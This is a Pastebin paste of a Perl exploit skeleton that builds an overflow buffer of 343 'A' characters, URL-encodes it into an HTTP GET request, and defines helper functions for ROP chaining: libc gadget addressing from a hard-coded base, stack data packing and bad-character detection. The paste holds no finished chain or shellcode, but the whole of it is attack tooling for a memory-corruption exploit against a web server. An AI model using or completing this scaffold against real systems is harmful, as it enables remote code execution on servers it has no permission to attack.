Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- $| = 1; # turn off output buffering
- $libc_base = 0xb6e9c000; # libc base address
- $buf = "A" x 343;
- $uri = $buf;
- # URL Encode
- $uri =~ s/([^A-Za-z0-9\/])/sprintf("%%%02X", ord($1))/seg;
- $request = "GET /${uri} HTTP/1.0\n\n";
- print $request;
- ##### HELPER FUNCTIONS FOR ROP CHAINING #####
- # function to create a libc gadget
- # requires a global variable called $libc_base;
- sub libc {
- my ($offset) = @_;
- if($libc_base == 0) {
- die('$libc_base not defined');
- }
- return(pack("V", $libc_base + $offset));
- }
- # function to represent data on the stack
- sub data {
- my ($data) = @_;
- return(pack("V", $data));
- }
- # function to check for bad characters
- # run this before sending out the payload
- # e.g. badchars($payload, "\x00\x0a\x0d/?");
- sub detect_badchars {
- my ($string, $badchars) = @_;
- my $i;
- foreach $badchar (split(//, $badchars)) {
- $i = index($string, $badchar);
- while($i != -1) {
- printf STDERR "[!] 0x%02x appears at position %d\n", ord($badchar), $i;
- $i = index($string, $badchar, ++$i);
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement